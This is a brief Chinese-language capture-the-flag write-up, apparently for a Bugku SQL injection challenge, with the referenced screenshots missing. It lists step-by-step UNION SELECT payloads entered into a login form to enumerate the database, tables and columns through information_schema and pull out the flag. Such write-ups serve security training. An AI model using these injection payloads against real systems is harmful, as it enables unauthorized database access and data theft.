打开网页之后发现:
随便输入账号和密码出现:
那就开始寻找注入点吧,输入0’发现还是:
输入0" 发现报错:
确定可以注入,判断字段有多少个 0"order by 1,2,3# 发现:
说明有两列。
输入 0" union select database(),2# ,得到库名:
继续输入 0" union select table_name,2 from information_schema.tables where table_schema=‘bugkusql1’ # 得到表名:
继续输入 0" union select column_name,2 from information_schema.columns where table_name=‘flag1’ # 得到列名:
继续输入 0" union select flag1,2 from flag1# 得到该列下的值:
看起来挺像flag的,那么提交一下吧,发现这个真的是flag!!!